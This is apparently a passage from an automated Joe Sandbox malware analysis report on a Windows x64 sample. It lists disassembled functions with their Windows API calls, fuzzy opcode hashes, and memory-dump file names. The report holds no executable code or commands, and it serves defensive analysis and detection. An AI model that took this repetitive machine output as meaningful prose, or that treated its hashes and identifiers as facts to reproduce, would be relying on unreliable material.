                                                                      • Part of subcall function 00007FF731C8E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9DF
                                                                      • Part of subcall function 00007FF731C8E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                    • String ID:
                                                                    • API String ID: 502429940-0
                                                                    • Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                                    • Instruction ID: 657398f6bb3873f966fdeb7ec1e1f960f2f8ee42947e7808370ff2fec97c5757
                                                                    • Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                                    • Instruction Fuzzy Hash: 85014032E19A91A2E748EB21E5842ADA331FB88BC0F904031DB5E43611CFB9E4B4D750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreatePriority
                                                                    • String ID: CreateThread failed
                                                                    • API String ID: 2610526550-3849766595
                                                                    • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                                    • Instruction ID: 0840ba981f47e4db877996228c81cc0ea72baaf913569724dc7f3febef685c34
                                                                    • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                                    • Instruction Fuzzy Hash: 0E115432E09A42A1F704FB14E8812BDF360FB84B94FE48131D64D02665DFBCE596D760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryInitializeMallocSystem
                                                                    • String ID: riched20.dll
                                                                    • API String ID: 174490985-3360196438
                                                                    • Opcode ID: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                                                    • Instruction ID: f1f9b0f65d4c3ec864600448e9ec7fd36f2e513dea47926291a5f3beb71b2fec
                                                                    • Opcode Fuzzy Hash: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                                                    • Instruction Fuzzy Hash: D8F04F72A18A4192EB00AF60F8541AAF7A0FB88754F944135E68E42B54DFBCE558DB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                    • String ID:
                                                                    • API String ID: 3842196933-0
                                                                    • Opcode ID: 3b8d238b842e59327892d7a9c381640647aeb18a20af9d6b9c58c04cd74eeba4
                                                                    • Instruction ID: 4a191fa15a3145d2c86427536cd3bad6f63283c9172b799e5f38d97c0498853c
                                                                    • Opcode Fuzzy Hash: 3b8d238b842e59327892d7a9c381640647aeb18a20af9d6b9c58c04cd74eeba4
                                                                    • Instruction Fuzzy Hash: 1E51C362F146426AFB10BBB5D4452FCA362AB85BC4FA00536DE0D57BD6EEACE500D360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 2371198981-0
                                                                    • Opcode ID: 2fcc375b70c6e36feabcfa94de8a7a9fce7d35ca2701883c5898f2074684aa35
                                                                    • Instruction ID: d786905b10ef5e86af8220d79a840058689d755793a46e0a46f9deef40a52ba6
                                                                    • Opcode Fuzzy Hash: 2fcc375b70c6e36feabcfa94de8a7a9fce7d35ca2701883c5898f2074684aa35
                                                                    • Instruction Fuzzy Hash: 41413161F18646A9EB04EB22E544279E365EB04BE0FA48631DE6C07BD5EFFCE091D314
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 2272807158-0
                                                                    • Opcode ID: fb5c64d1f8032ebf61ecf4449d8b2102e11d21436edbdafeba6705f33b7752f9
                                                                    • Instruction ID: 7776b50c1384532d5a4b6a693746551e088d8a4220490b3b97cf6a7b3c5a82a6
                                                                    • Opcode Fuzzy Hash: fb5c64d1f8032ebf61ecf4449d8b2102e11d21436edbdafeba6705f33b7752f9
                                                                    • Instruction Fuzzy Hash: 0D41D673E0878192EB109B15E488669A361FB48BB4FA05734DFAD07AD5CFBCE890D710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 2176759853-0
                                                                    • Opcode ID: fa376e6cf3c94224980e1d9c943e6820de754cda6ff50216ef5d929fb6ca330a
                                                                    • Instruction ID: 38e33b8beba843172a0f843aad4e15e20fac21952b7e7b1023c7d240a1ef23bf
                                                                    • Opcode Fuzzy Hash: fa376e6cf3c94224980e1d9c943e6820de754cda6ff50216ef5d929fb6ca330a
                                                                    • Instruction Fuzzy Hash: 4B21C073E28B8191EB10AB65A84016AA360FB89BD0FA44235EB8D03B95CFBCD191C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: std::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 1875163511-0
                                                                    • Opcode ID: 3747592df6810f3b80908203676324b628f5a531b91ae398ec61740efd87838a
                                                                    • Instruction ID: 9a24544731e2d85f38baf7e026df9c303e2bc7af48600328add7dc905a1f4c90
                                                                    • Opcode Fuzzy Hash: 3747592df6810f3b80908203676324b628f5a531b91ae398ec61740efd87838a
                                                                    • Instruction Fuzzy Hash: 4C318422E08A8AB1FB25B714E4453BDE3A0FB50794FE40432D68C066A5EFFCE946D311
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1203560049-0
                                                                    • Opcode ID: 21f673f0b1b21e1c806b71d7983ce794a7d8576a348defe7dddd008c7114c812
                                                                    • Instruction ID: 75e23a3fc2f1ef87f79494cb8aed395116fb4ebf052d5da3d7333690a287f19d
                                                                    • Opcode Fuzzy Hash: 21f673f0b1b21e1c806b71d7983ce794a7d8576a348defe7dddd008c7114c812
                                                                    • Instruction Fuzzy Hash: 87210D22F18782A1EF20AF25E48426DA361FF88BD4FA06231EA9D43AD4DF7CD541D710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3118131910-0
                                                                    • Opcode ID: 0f937c2f2206f17e136aa9ca44b849dff8f95196abcbcd754bafe0a2f8f578b6
                                                                    • Instruction ID: eba1fd44f6e7b7c175ea47757ba10281a708c88e7a74d11fe0da1a08579fa501
                                                                    • Opcode Fuzzy Hash: 0f937c2f2206f17e136aa9ca44b849dff8f95196abcbcd754bafe0a2f8f578b6
                                                                    • Instruction Fuzzy Hash: B921B622E1878291EB10EB25F48426EA360FB88BD4FA06230EA9D46A95DF7CD541DB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1203560049-0
                                                                    • Opcode ID: 40705733cb67a71df3fff18e5a759fe286a379e9125aaba215c8f3cf6f78a58b
                                                                    • Instruction ID: 3652dc093a4cf8c1221cf3192aed579c412c4064aa9f5b5a533f4e1b81a8ec1d
                                                                    • Opcode Fuzzy Hash: 40705733cb67a71df3fff18e5a759fe286a379e9125aaba215c8f3cf6f78a58b
                                                                    • Instruction Fuzzy Hash: 64217422E1878192EB10AB29F484269A361FBC8BA4FA05231EA9D47BD5DF7CD541DB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                                                    • Instruction ID: 0e1cc8c84fa8c27d44d17160c0e1cb8c7c2d2cbcad7aa987a3ea707afb6c6059
                                                                    • Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                                                    • Instruction Fuzzy Hash: C2E04F28F1530552FB44BB71AC9137D6366AF88B41FA48838C80E43396CEBEA4099B20
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F8A5
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F8AB
                                                                      • Part of subcall function 00007FF731C83E88: FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                    • String ID:
                                                                    • API String ID: 3587649625-0
                                                                    • Opcode ID: 16a68227de60e06bbac92a1992007f9f6dbd4a0c9fd84afcacd01604ba74844e
                                                                    • Instruction ID: d397da1544bb36954292ac9841122c50a68303a084143af796441cd9e1b03b6e
                                                                    • Opcode Fuzzy Hash: 16a68227de60e06bbac92a1992007f9f6dbd4a0c9fd84afcacd01604ba74844e
                                                                    • Instruction Fuzzy Hash: 66919033E18791A8FB10EF64D4842ADA361FB85798FA04135EA6C07AE9DFF8D545D320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 87b83290662297e5c2129baa50ca266b02a142d2f175bee5a0958314259d1dcd
                                                                    • Instruction ID: 44770a883b2ee908e5b1a641103b6121dd374424687f2bae270a68270e49d062
                                                                    • Opcode Fuzzy Hash: 87b83290662297e5c2129baa50ca266b02a142d2f175bee5a0958314259d1dcd
                                                                    • Instruction Fuzzy Hash: 6B41D722F1465298FB00FBB5D4416EDA360AF44BE8FA41235DE5D27AC9DEF8D442D310
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF731C8270D), ref: 00007FF731C82869
                                                                    • GetLastError.KERNEL32(?,00007FF731C8270D), ref: 00007FF731C82878
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                                                    • Instruction ID: 4bccf124bebe4e6d537dd6fca13268c51b0431382a55e8a20c8a77bcd32ebb76
                                                                    • Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                                                    • Instruction Fuzzy Hash: 9831E732F19942A2EF607B2AD5846B5A350AF08FD4FA55131EE1C47F90DFBCD541E620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1746051919-0
                                                                    • Opcode ID: 71f64fde1668b052c0320d8937d0d2131f92a6a8039284af6fd262a6b65af6e7
                                                                    • Instruction ID: c129ec924e9e8c47fc2b36cc8b9be8c2f38c1975fad2eb823153d128fcada05f
                                                                    • Opcode Fuzzy Hash: 71f64fde1668b052c0320d8937d0d2131f92a6a8039284af6fd262a6b65af6e7
                                                                    • Instruction Fuzzy Hash: DC31C622E1878266EB14AB15E44536EF360FB84B90FA44235EB9C07BD5DFBCE540D710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersFlushTime
                                                                    • String ID:
                                                                    • API String ID: 1392018926-0
                                                                    • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                                    • Instruction ID: 795f293d571d347ddc5a992d4d76d28fbc281ca953abedd00703262b1a48f4e9
                                                                    • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                                    • Instruction Fuzzy Hash: CE21F922E0D75271EB71AA51D4853B6E790EF09B94FA54031DE4C06A91EEBCD486D310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
